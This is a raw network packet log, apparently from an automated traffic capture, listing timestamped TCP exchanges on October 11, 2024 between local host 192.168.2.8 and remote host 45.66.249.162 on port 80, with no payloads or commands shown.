                                                                                                                                                              Oct 11, 2024 22:32:39.224136114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224148035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224164009 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224167109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224188089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224188089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224200010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224216938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224226952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224235058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224256992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224276066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224277020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224296093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224299908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224315882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224323988 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224334002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224338055 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224354029 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224359989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224373102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224397898 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224562883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224581003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224601984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224603891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224618912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224623919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224631071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224642038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224664927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224664927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224675894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224687099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224701881 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224705935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224723101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224726915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224733114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224746943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224766970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224769115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224780083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224790096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224803925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.224806070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.224814892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225096941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225121021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225131035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225188017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225202084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225217104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225219011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225240946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225245953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225261927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225265026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225277901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225282907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225296974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225305080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225321054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225327969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225338936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225354910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225374937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225394964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225398064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225414038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225421906 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225436926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225444078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225457907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225459099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225472927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225480080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225493908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225501060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.225516081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.225538969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.311244965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311270952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311301947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311320066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311341047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311357021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311378956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.311393023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.311443090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372447014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372550964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372587919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372617006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372631073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372668982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372677088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372721910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372734070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372781038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372798920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372847080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372852087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372894049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.372894049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372951984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.372958899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373006105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373020887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373068094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373070955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373115063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373117924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373162031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373178959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373233080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373233080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373281002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373290062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373323917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373327017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373372078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373375893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373420000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373435974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373487949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373501062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373554945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373563051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373610020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373611927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373675108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373701096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373709917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373737097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373783112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373786926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373828888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373830080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373874903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373876095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373922110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.373925924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.373991966 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374007940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374059916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374068022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374114037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374115944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374162912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374180079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374231100 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374241114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374289036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374305010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374351978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374352932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374397993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374401093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374444962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374449968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374497890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374511003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374555111 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374557018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374600887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374603033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374649048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374650002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374695063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374708891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374741077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374756098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374802113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374804974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374847889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374851942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374896049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374939919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.374952078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.374999046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375035048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375058889 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375060081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375104904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375128984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375174999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375179052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375220060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375242949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375288010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375293970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375329018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375334978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375380993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375389099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375431061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375451088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375493050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375499964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375534058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375555038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375601053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375605106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375646114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375646114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375694036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375695944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375740051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375740051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375787020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375787973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375833988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375837088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375876904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375881910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375927925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.375929117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375972033 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.375974894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376020908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376020908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376058102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376065969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376110077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376113892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376158953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376202106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376205921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376249075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376291990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376302958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376338959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376343012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376388073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376422882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376431942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376437902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376482964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376527071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376529932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376573086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376621962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376631975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376674891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376678944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376717091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376763105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376764059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376806974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376810074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376854897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376899004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376904011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376945019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.376945972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376991987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.376993895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377034903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377039909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377084017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377084970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377131939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377132893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377177954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377183914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377223969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377268076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377274990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377314091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377357006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377362013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377402067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377408028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377453089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377489090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377499104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377501965 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377545118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377588987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377593040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377635002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377681971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377687931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377727032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377772093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377775908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377815962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377816916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377862930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377890110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377898932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377902985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377945900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.377948999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377993107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.377993107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.378040075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.378040075 CEST4970780192.168.2.845.66.249.162
